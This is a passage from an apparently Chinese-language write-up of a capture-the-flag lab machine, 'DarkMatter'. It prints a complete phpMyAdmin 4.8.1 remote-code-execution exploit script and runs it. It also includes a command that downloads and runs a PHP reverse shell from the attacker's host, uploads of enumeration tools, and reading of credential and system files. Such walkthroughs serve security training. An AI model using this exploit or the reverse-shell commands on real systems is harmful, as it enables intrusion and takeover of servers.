pam\nth3-!llum!n@t0r<\/code><\/pre>\n<\/div><\/p>\n\u770b\u4e00\u4e0b\u7248\u672c\u53f74.8.1<\/code>\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u6709\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u7ec4\u4ef6\u4e5f\u662f\u91cd\u707e\u533a\u3002\u3002<\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ searchsploit phpmyadmin 4.8.1\n----------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nphpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1) | php\/webapps\/44924.txt\nphpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2) | php\/webapps\/44928.txt\nphpMyAdmin 4.8.1 - Remote Code Execution (RCE) | php\/webapps\/50457.py\n----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ searchsploit -m php\/webapps\/50457.py\n Exploit: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)\n URL: https:\/\/www.exploit-db.com\/exploits\/50457\n Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/50457.py\n Codes: CVE-2018-12613\n Verified: True\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/DarkMatter\/50457.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ cat 50457.py \n# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE)\n# Date: 17\/08\/2021\n# Exploit Author: samguy\n# Vulnerability Discovery By: ChaMd5 & Henry Huang\n# Vendor Homepage: http:\/\/www.phpmyadmin.net\n# Software Link: https:\/\/github.com\/phpmyadmin\/phpmyadmin\/archive\/RELEASE_4_8_1.tar.gz\n# Version: 4.8.1\n# Tested on: Linux - Debian Buster (PHP 7.3)\n# CVE : CVE-2018-12613\n\n#!\/usr\/bin\/env python\n\nimport re, requests, sys\n\n# check python major version\nif sys.version_info.major == 3:\n import html\nelse:\n from six.moves.html_parser import HTMLParser\n html = HTMLParser()\n\nif len(sys.argv) < 7:\n usage = """Usage: {} [ipaddr] [port] [path] [username] [password] [command]\nExample: {} 192.168.56.65 8080 \/phpmyadmin username password whoami"""\n print(usage.format(sys.argv[0],sys.argv[0]))\n exit()\n\ndef get_token(content):\n s = re.search('token"\\s*value="(.*?)"', content)\n token = html.unescape(s.group(1))\n return token\n\nipaddr = sys.argv[1]\nport = sys.argv[2]\npath = sys.argv[3]\nusername = sys.argv[4]\npassword = sys.argv[5]\ncommand = sys.argv[6]\n\nurl = "http:\/\/{}:{}{}".format(ipaddr,port,path)\n\n# 1st req: check login page and version\nurl1 = url + "\/index.php"\nr = requests.get(url1)\ncontent = r.content.decode('utf-8')\nif r.status_code != 200:\n print("Unable to find the version")\n exit()\n\ns = re.search('PMA_VERSION:"(\\d+\\.\\d+\\.\\d+)"', content)\nversion = s.group(1)\nif version != "4.8.0" and version != "4.8.1":\n print("The target is not exploitable".format(version))\n exit()\n\n# get 1st token and cookie\ncookies = r.cookies\ntoken = get_token(content)\n\n# 2nd req: login\np = {'token': token, 'pma_username': username, 'pma_password': password}\nr = requests.post(url1, cookies = cookies, data = p)\ncontent = r.content.decode('utf-8')\ns = re.search('logged_in:(\\w+),', content)\nlogged_in = s.group(1)\nif logged_in == "false":\n print("Authentication failed")\n exit()\n\n# get 2nd token and cookie\ncookies = r.cookies\ntoken = get_token(content)\n\n# 3rd req: execute query\nurl2 = url + "\/import.php"\n# payload\npayload = '''select '<?php system("{}") ?>';'''.format(command)\np = {'table':'', 'token': token, 'sql_query': payload }\nr = requests.post(url2, cookies = cookies, data = p)\nif r.status_code != 200:\n print("Query failed")\n exit()\n\n# 4th req: execute payload\nsession_id = cookies.get_dict()['phpMyAdmin']\nurl3 = url + "\/index.php?target=db_sql.php%253f\/..\/..\/..\/..\/..\/..\/..\/..\/var\/lib\/php\/sessions\/sess_{}".format(session_id)\nr = requests.get(url3, cookies = cookies)\nif r.status_code != 200:\n print("Exploit failed")\n exit()\n\n# get result\ncontent = r.content.decode('utf-8', errors="replace")\ns = re.search("select '(.*?)\\n'", content, re.DOTALL)\nif s != None:\n print(s.group(1))<\/code><\/pre>\n18\u5e74\u7684\u6d1e\uff0c\u9776\u573a\u662f21\u5e74\u7684\uff0c\u53ef\u80fd\u662f\u8fd9\u4e2a\uff0c\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ python3 50457.py 172.20.10.6 80 \/phpmyadmin pam 'th3-!llum!n@t0r' whoami\nwww-data<\/code><\/pre>\n\u53ef\u4ee5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\u3002<\/p>\n
# python3 50457.py 172.20.10.6 80 \/phpmyadmin pam 'th3-!llum!n@t0r' 'whoami;id'\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\n# python3 50457.py 172.20.10.6 80 \/phpmyadmin pam 'th3-!llum!n@t0r' 'cat \/etc\/passwd' \nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:101:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\navahi-autoipd:x:105:113:Avahi autoip daemon,,,:\/var\/lib\/avahi-autoipd:\/usr\/sbin\/nologin\nsshd:x:106:65534::\/run\/sshd:\/usr\/sbin\/nologin\ndarkenergy:x:1000:1000:DarkEnergy,,,:\/home\/darkenergy:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmysql:x:107:115:MySQL Server,,,:\/nonexistent:\/bin\/false<\/code><\/pre>\n\u5c1d\u8bd5\u53cd\u5f39shell\uff1a<\/p>\n
# kali\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n172.20.10.6 - - [07\/Aug\/2024 22:26:34] "GET \/revshell.php HTTP\/1.1" 200 -\n^C\nKeyboard interrupt received, exiting.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp]\n\u2514\u2500$ head revshell.php \n\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '172.20.10.8'; \/\/ You have changed this\n $port = 1234; \/\/ And this\n $chunk_size = 1400;<\/code><\/pre>\n# attacked\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ python3 50457.py 172.20.10.6 80 \/phpmyadmin pam 'th3-!llum!n@t0r' 'cd \/tmp;wget http:\/\/172.20.10.8:8888\/revshell.php;chmod +x revshell.php;php revshell.php'<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@DarkMatter:\/$ ls -la\ntotal 68\ndrwxr-xr-x 18 root root 4096 Nov 10 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 10 2021 ..\nlrwxrwxrwx 1 root root 7 Nov 10 2021 bin -> usr\/bin\ndrwxr-xr-x 3 root root 4096 Nov 10 2021 boot\ndrwxr-xr-x 17 root root 3140 Aug 7 19:57 dev\ndrwxr-xr-x 78 root root 4096 Aug 7 19:57 etc\ndrwxr-xr-x 3 root root 4096 Nov 10 2021 home\nlrwxrwxrwx 1 root root 30 Nov 10 2021 initrd.img -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 30 Nov 10 2021 initrd.img.old -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 7 Nov 10 2021 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Nov 10 2021 lib32 -> usr\/lib32\nlrwxrwxrwx 1 root root 9 Nov 10 2021 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Nov 10 2021 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Nov 10 2021 lost+found\ndrwxr-xr-x 3 root root 4096 Nov 10 2021 media\ndrwxr-xr-x 2 root root 4096 Nov 10 2021 mnt\ndrwxr-xr-x 2 root root 4096 Nov 21 2021 opt\ndr-xr-xr-x 149 root root 0 Aug 7 19:56 proc\ndrwx------ 4 root root 4096 Nov 20 2021 root\ndrwxr-xr-x 19 root root 540 Aug 7 19:57 run\nlrwxrwxrwx 1 root root 8 Nov 10 2021 sbin -> usr\/sbin\ndrwxr-xr-x 2 root root 4096 Nov 13 2021 srv\ndr-xr-xr-x 13 root root 0 Aug 7 19:56 sys\ndrwxrwxrwt 2 root root 4096 Aug 7 22:26 tmp\ndrwxr-xr-x 14 root root 4096 Nov 10 2021 usr\ndrwxr-xr-x 12 root root 4096 Nov 13 2021 var\nlrwxrwxrwx 1 root root 27 Nov 10 2021 vmlinuz -> boot\/vmlinuz-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 27 Nov 10 2021 vmlinuz.old -> boot\/vmlinuz-5.10.0-9-amd64\n(remote) www-data@DarkMatter:\/$ sudo -l\n[sudo] password for www-data: \nSorry, try again.\n[sudo] password for www-data: \nsudo: 1 incorrect password attempt\n(remote) www-data@DarkMatter:\/$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/passwd\n\/usr\/bin\/sudo\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n(remote) www-data@DarkMatter:\/$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\n(remote) www-data@DarkMatter:\/$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don't have to run the `crontab'\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# | .------------- hour (0 - 23)\n# | | .---------- day of month (1 - 31)\n# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...\n# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# | | | | |\n# * * * * * user-name command to be executed\n17 * * * * root cd \/ && run-parts --report \/etc\/cron.hourly\n25 6 * * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.daily )\n47 6 * * 7 root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.weekly )\n52 6 1 * * root test -x \/usr\/sbin\/anacron || ( cd \/ && run-parts --report \/etc\/cron.monthly )<\/code><\/pre>\n\u7136\u540e\u4e0a\u4f20pspy64\u770b\u4e00\u4e0b\uff1a<\/p>\n
(remote) www-data@DarkMatter:\/tmp$ wget http:\/\/172.20.10.8:8888\/lpspy64;chmod +x lpspy64<\/code><\/pre>\n\u5565\u90fd\u6ca1\u53d1\u73b0\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u5176\u4ed6\u4fe1\u606f\uff0c\u4e0a\u4f20linpeas.sh<\/code>\u3002<\/p>\n(remote) www-data@DarkMatter:\/tmp$ wget http:\/\/172.20.10.8:8888\/linpeas.sh;chmod +x linpeas.sh<\/code><\/pre>\n\u53d1\u73b0\u627e\u5230\u4e86\u5947\u602a\u7684\u4e1c\u897f\uff1a<\/p>\n
\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Checking 'sudo -l', \/etc\/sudoers, and \/etc\/sudoers.d\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#sudo-and-suid\nSudoers file: \/etc\/sudoers.d\/darkenergy is readable\ndarkenergy rettaMkraD = (root) NOPASSWD: \/bin\/bash<\/code><\/pre>\n\u8fd9\u73a9\u610f\u53ef\u8bfb\u3002\u3002\u3002\u3002\u3002<\/p>\n
(remote) www-data@DarkMatter:\/etc\/sudoers.d$ cat \/etc\/group | grep darkenergy\ncdrom:x:24:darkenergy\nfloppy:x:25:darkenergy\naudio:x:29:darkenergy\ndip:x:30:darkenergy\nvideo:x:44:darkenergy\nplugdev:x:46:darkenergy\nnetdev:x:109:darkenergy\nbluetooth:x:112:darkenergy\ndarkenergy:x:1000:<\/code><\/pre>\n\u8fd9\u4e2arettaMkraD<\/code>\u611f\u89c9\u662fDarkMatter<\/code>\uff0c\u62bd\u8c61\u3002\u3002\u3002\u3002<\/p>\n(remote) www-data@DarkMatter:\/$ find \/ -group darkenergy 2>\/dev\/null\n\/home\/darkenergy\n\/opt\/note.txt\n\/var\/lib\/sudo\/lectured\/darkenergy\n\n(remote) www-data@DarkMatter:\/$ cat \/opt\/note.txt\nwww-data can read root's important.txt file but idk how ;(<\/code><\/pre>\n\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u5176\u4ed6\u7279\u6b8a\u6743\u9650\uff0c\u53d1\u73b0\u6ca1\u6709Acls<\/code>\u4ee5\u53cadoas<\/code>\u4e4b\u7c7b\u7684\uff0c\u5c1d\u8bd5\u641e\u5176\u4ed6\u7684\uff1a<\/p>\n(remote) www-data@DarkMatter:\/$ cd \/opt\n(remote) www-data@DarkMatter:\/opt$ ls -la \ntotal 2444\ndrwxr-xr-x 2 root root 4096 Nov 21 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 10 2021 ..\n-rwxrwxr-- 1 darkenergy darkenergy 59 Nov 14 2021 note.txt\n-rwxrwxrwx 1 root root 2489009 Nov 21 2021 website.zip\n(remote) www-data@DarkMatter:\/opt$ cp website.zip \/tmp\/\n(remote) www-data@DarkMatter:\/opt$ cd \/tmp\n(remote) www-data@DarkMatter:\/tmp$ unzip website.zip \n......\n(remote) www-data@DarkMatter:\/tmp$ ls\ndarkmatter linpeas.sh lpspy64 revshell.php website.zip\n(remote) www-data@DarkMatter:\/tmp$ cd darkmatter\/\n(remote) www-data@DarkMatter:\/tmp\/darkmatter$ ls -la\ntotal 92\ndrwxr-x--x 6 www-data www-data 4096 Nov 21 2021 .\ndrwxrwxrwt 3 root root 4096 Aug 7 23:01 ..\n-rwxr-xr-x 1 www-data www-data 6427 Nov 14 2021 blog.php\n-rwxr-xr-x 1 www-data www-data 319 Nov 14 2021 conn.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 14 2021 css\n-rwxr-xr-x 1 www-data www-data 350 Nov 14 2021 footer.php\n-rwxr-xr-x 1 www-data www-data 272 Nov 14 2021 header.php\n-rwxr-xr-x 1 www-data www-data 2464 Nov 14 2021 home.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 14 2021 images\n-rwxr-xr-x 1 www-data www-data 476 Nov 14 2021 index.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 14 2021 js\n-rwxr-xr-x 1 www-data www-data 3416 Nov 21 2021 login.php\n-rwxr-xr-x 1 www-data www-data 108 Nov 14 2021 logout.php\n-rwxr-xr-x 1 www-data www-data 1669 Nov 14 2021 manage.php\n-rwxr-xr-x 1 www-data www-data 3265 Nov 14 2021 navbar.php\n-rwxr-xr-x 1 www-data www-data 2854 Nov 14 2021 profile.php\n-rwxr-x--x 1 www-data www-data 6315 Nov 21 2021 register.php\n-rwxr-xr-x 1 www-data www-data 607 Nov 14 2021 status.php\n-rwxr-xr-x 1 www-data www-data 6172 Nov 14 2021 update.php\ndrwxr-xr-x 2 www-data www-data 4096 Nov 14 2021 upload\n(remote) www-data@DarkMatter:\/tmp\/darkmatter$ cat conn.php\n<?php\n \/\/ connection vars\n $hname = "127.0.0.1";\n $uname = "pam";\n $upass = "th3-!llum!n@t0r";\n $dbname = "mysql";\n\n \/\/ create conn\n $conn = mysqli_connect($hname, $uname, $upass, $dbname);\n\n \/\/ check conn\n if (!$conn) {\n die("Connection failed : " . mysqli_connect_error());\n }\n?>\n\n(remote) www-data@DarkMatter:\/tmp\/darkmatter$ cat profile.php\n.........\n<!--\nDarkMatter's All Power is here ^(#\uff40\u2200 \u00b4)_\u03a8\n<?xml version="1.0" encoding="utf-8"?>\n<KeyFile>\n <Meta>\n <Version>2.0<\/Version>\n <\/Meta>\n <Key>\n <Data Hash="180EC55B">\n AE9AEE5F 228C56A6 42D81928 59EF70B8\n 1A9468F9 C7FA509E 6A290BE5 60111681\n <\/Data>\n <\/Key>\n<\/KeyFile>\n-->\n.........\n\n(remote) www-data@DarkMatter:\/tmp\/darkmatter$ cat register.php\n.........\nif ($_POST['vpassword'] == $password) {\n \/\/ don't forget to "rev" your password after cracking hash\n $vpassword = sha1(md5("s3cr37" . $password . "p4ssw0rd"));\n } \n.........\n(remote) www-data@DarkMatter:\/tmp\/darkmatter$ cd upload\/\n(remote) www-data@DarkMatter:\/tmp\/darkmatter\/upload$ ls -la\ntotal 1376\ndrwxr-xr-x 2 www-data www-data 4096 Nov 14 2021 .\ndrwxr-x--x 6 www-data www-data 4096 Nov 21 2021 ..\n-rwxr-xr-x 1 www-data www-data 50193 Nov 14 2021 dp.jpg\n-rwxr-xr-x 1 www-data www-data 1345261 Nov 14 2021 dp.jpg.bak<\/code><\/pre>\n\u63a2\u7d22<\/h3>\n
\u770b\u4e00\u4e0b\u662f\u5426\u6709\u9690\u85cf\u4fe1\u606f\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ exiftool dp.jpg\nExifTool Version Number : 12.23\nFile Name : dp.jpg\nDirectory : .\nFile Size : 49 KiB\nFile Modification Date\/Time : 2024:08:07 23:17:30-04:00\nFile Access Date\/Time : 2024:08:07 23:18:19-04:00\nFile Inode Change Date\/Time : 2024:08:07 23:17:30-04:00\nFile Permissions : -rw-r--r--\nFile Type : JPEG\nFile Type Extension : jpg\nMIME Type : image\/jpeg\nJFIF Version : 1.01\nResolution Unit : None\nX Resolution : 1\nY Resolution : 1\nProfile CMM Type : Little CMS\nProfile Version : 2.1.0\nProfile Class : Display Device Profile\nColor Space Data : RGB\nProfile Connection Space : XYZ\nProfile Date Time : 2012:01:25 03:41:57\nProfile File Signature : acsp\nPrimary Platform : Apple Computer Inc.\nCMM Flags : Not Embedded, Independent\nDevice Manufacturer : \nDevice Model : \nDevice Attributes : Reflective, Glossy, Positive, Color\nRendering Intent : Perceptual\nConnection Space Illuminant : 0.9642 1 0.82491\nProfile Creator : Little CMS\nProfile ID : 0\nProfile Description : c2\nProfile Copyright : FB\nMedia White Point : 0.9642 1 0.82491\nMedia Black Point : 0.01205 0.0125 0.01031\nRed Matrix Column : 0.43607 0.22249 0.01392\nGreen Matrix Column : 0.38515 0.71687 0.09708\nBlue Matrix Column : 0.14307 0.06061 0.7141\nRed Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)\nGreen Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)\nBlue Tone Reproduction Curve : (Binary data 64 bytes, use -b option to extract)\nImage Width : 959\nImage Height : 640\nEncoding Process : Baseline DCT, Huffman coding\nBits Per Sample : 8\nColor Components : 3\nY Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)\nImage Size : 959x640\nMegapixels : 0.614\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ binwalk dp.jpg \n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n0 0x0 JPEG image data, JFIF standard 1.01\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/DarkMatter]\n\u2514\u2500$ binwalk dp.jpg.bak \n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n0 0x0 PNG image, 3840 x 2160, 8-bit\/color RGBA, non-interlaced\n159 0x9F Zlib compressed data, best compression<\/code><\/pre>\n
![\"image-20240808092403527\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859076.png\")
<\/div><\/p>\n![\"image-20240808092538103\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859077.png\")
<\/div>![\"image-20240808092559176\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859078.png\")
<\/div>![\"image-20240808092718164\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859079.png\")
<\/div><\/p>\n![\"image-20240808092928277\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859080.png\")
<\/div><\/p>\n![\"image-20240808093009458\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859081.png\")
<\/div><\/p>\n![\"image-20240808093513408\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859082.png\")
<\/div><\/p>\n![\"image-20240808100403692\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859083.png\")
<\/div><\/p>\n![\"image-20240808102745706\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859084.png\")
<\/div><\/p>\n![\"image-20240808112612042\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859085.png\")
<\/div>![\"image-20240808112554465\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859086.png\")
<\/div><\/p>\n![\"image-20240808232412742\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859087.png\")
<\/div><\/p>\n![\"image-20240809000838388\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859088.png\")
<\/div><\/p>\n![\"image-20240809085837351\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859089.png\")
<\/div><\/p>\n![\"image-20240809012130535\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408090859090.png\")
<\/div><\/p>\n